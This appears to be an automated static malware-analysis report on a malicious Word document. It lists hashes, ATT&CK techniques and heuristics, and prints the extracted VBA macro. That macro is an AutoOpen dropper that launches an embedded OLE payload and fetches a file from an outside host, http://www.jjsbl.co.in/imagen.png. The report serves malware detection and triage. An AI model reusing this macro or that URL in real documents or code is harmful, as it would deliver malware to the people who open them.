Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b4f16a15bb66e81b…

MALICIOUS

Office (OOXML)

1.28 MB Created: 2012-06-07 21:43:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2016-06-30
MD5: 64a5dc93ec4726fcc6531cb3b0422125 SHA-1: 4049e9500299915080619fb0a0a806cf3ded4f1d SHA-256: b4f16a15bb66e81be18214d073be0479b3928c7b2f81553aa68692f8f6949fe5
132 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OOXML document containing a VBA macro that executes an embedded OLE object and attempts to download a file from 'http://www.jjsbl.co.in/imagen.png'. The document body explicitly instructs the user to enable content, a common lure for macro-based malware.

Heuristics 7

  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.jjsbl.co.in/imagen.png In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 844 bytes
SHA-256: 923a6f009813e43ce6ec9a9a7d46195555841a0d1cfa69258fbb8dfec3fb73fe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
'
' AutoOpen Macro
'
'
    ActiveDocument.Shapes("Object 2").Select
    Selection.ShapeRange(1).OLEFormat.DoVerb VerbIndex:=wdOLEVerbPrimary
    
   Selection.MoveUp Unit:=wdLine, Count:=3
   Selection.MoveDown Unit:=wdLine, Count:=5, Extend:=wdExtend
    Selection.InlineShapes.AddPicture FileName:= _
    "http://www.jjsbl.co.in/imagen.png" _
    , LinkToFile:=False, SaveWithDocument:=True
  
 
   
End Sub
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject1.bin 1206784 bytes
SHA-256: fc093465dd6e6c3fac4901c68c4a989a04b40d99ab027535f2ab3b8c0e4ff769
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.83, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML word/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 1194931 bytes
SHA-256: 29cc00f4f33521e3b8d4f90ad0b298198725e68a68cbfdf920f11b89e484ab5f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.88, consistent with packed or encrypted content.
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9728 bytes
SHA-256: 0911f502c0efdd2880186deb0a488df526b8475025e4235a4965a5fca8ce92e9

Open this report in the interactive analyzer, or submit your own file for analysis.